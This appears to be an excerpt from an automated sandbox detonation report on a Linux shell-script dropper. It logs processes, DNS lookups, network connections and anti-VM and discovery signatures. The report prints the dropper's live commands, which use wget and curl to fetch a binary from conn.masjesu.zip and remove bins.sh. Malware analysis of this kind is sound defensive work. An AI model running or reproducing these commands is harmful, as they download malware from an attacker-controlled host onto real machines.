/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 89.187.167.4:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 01:50

Reported

2024-10-18 01:52

Platform

debian9-armhf-20240611-en

Max time kernel

150s

Max time network

3s

Command Line

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A